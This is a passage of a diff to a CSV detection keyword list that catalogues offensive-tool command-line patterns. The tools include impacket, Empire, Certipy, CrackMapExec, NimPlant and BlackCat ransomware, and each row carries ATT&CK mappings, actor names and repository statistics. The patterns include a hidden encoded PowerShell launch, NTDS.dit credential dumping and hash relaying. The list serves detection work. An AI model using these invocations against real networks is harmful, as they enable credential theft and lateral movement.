helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* --no-http-server -smb2support -t * -c *","offensive_tool_keyword","AD exploitation cheat sheet","Example command to relay the hash to authenticate as local admin (if the service account has these privileges) and run calc.exe. Omit the -c parameter to attempt a secretsdump instead.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --nomain -d:exportDll --passL:*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"* --nomain -d:exportDll --passL:*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "* --no-net*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -NoP -sta -NonI -W Hidden -Enc *","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"* -no-pass -dns-tcp -nameserver*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"* -no-pass -just-dc-user *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -no-pass -dns-tcp -nameserver*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"* -no-pass -just-dc-user *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* -no-pass rid-hijack*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" -"* -no-pass -usersfile *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* NoPowerShell.*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"* No-PowerShell.cs*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"* -no-pass -usersfile *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* NoPowerShell.*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"* No-PowerShell.cs*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" "* --no-ppid-spoof*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"* -no-preauth * -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -no-preauth * -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* -NoPRo -wIN 1 -nONi -eN Sh33L*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "* --no-prop*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --no-prop-servers*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -1382,17 +1382,17 @@ "* nping-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nrpe-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* NtCr3at3Thr3adEx @ *","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" -"* -ntds *.dit *-system *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* -ntds NTDS.dit -filters*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" -"* -ntds NTDS.dit -system SYSTEM -outputdir /*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"* -ntds *.dit *-system *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -ntds NTDS.dit -filters*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"* -ntds NTDS.dit -system SYSTEM -outputdir /*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" "* -ntds ntds.dit.save -system system.save LOCAL*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* --ntds-history*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* --ntds-pwdLastSet*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -nthash * -domain-sid *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* --ntds-history*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --ntds-pwdLastSet*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -nthash * -domain-sid *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "* -nthash * -spn * -domain-sid * -domain *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* -nthash *-domain-sid S-1-5-11-39129514-1145628974-103568174 -domain*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* ntlm.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* ntlm.wordlist *--hex-wordlist*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","18342","2659","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" +"* ntlm.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* ntlm.wordlist *--hex-wordlist*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" "* --ntlm-proxy-ip * --ntlm-proxy-port *","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "* ntlmrecon*","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","0","N/A","N/A","5","419","67","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" "* NTLMv1 captured *","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" @@ -1404,18 +1404,18 @@ "* NuagesImplant*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "* -o /share/payloads/*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* -o cowroot*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/exrienz/DirtyCow","1","0","N/A","N/A","1","27","27","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z" -"* -o ffuf.csv*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"* -o ffuf.csv*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" "* -oA icebreaker-scan*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" -"* --obfuscate *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* --obfuscate *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "* 